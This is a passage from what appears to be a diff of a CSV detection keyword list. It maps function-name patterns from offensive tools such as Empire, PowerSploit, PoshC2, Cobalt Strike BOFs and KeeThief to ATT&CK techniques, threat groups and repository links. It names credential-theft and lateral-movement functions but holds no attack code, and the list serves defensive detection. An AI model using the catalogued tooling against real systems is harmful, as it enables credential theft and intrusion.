TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*find-interestingfile -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-KeePassconfig*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-LogonScriptCredentials -LogonScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*Find-LogonScriptCredentials.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*FindModule *.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*FindObjects-BOF*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" -"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
-"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*FindProcessTokenAndDuplicate*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 